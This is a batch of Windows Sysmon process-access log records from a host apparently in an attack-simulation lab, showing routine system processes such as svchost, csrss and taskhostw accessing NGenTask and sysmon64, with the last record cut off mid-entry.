{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6137,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010DF220B00}\r\nSourceProcessId: 2360\r\nSourceThreadId: 4760\r\nSourceImage: C:\\Windows\\system32\\taskhostw.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010A12C0B00}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010DF220B00}","SourceProcessId":"2360","SourceThreadId":"4760","SourceImage":"C:\\Windows\\system32\\taskhostw.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010A12C0B00}","TargetProcessId":"3344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFF445411E2)","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6138,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010A12C0B00}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010A12C0B00}","TargetProcessId":"3344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6139,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6140,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6141,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6142,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6143,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6144,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.804","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.804\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 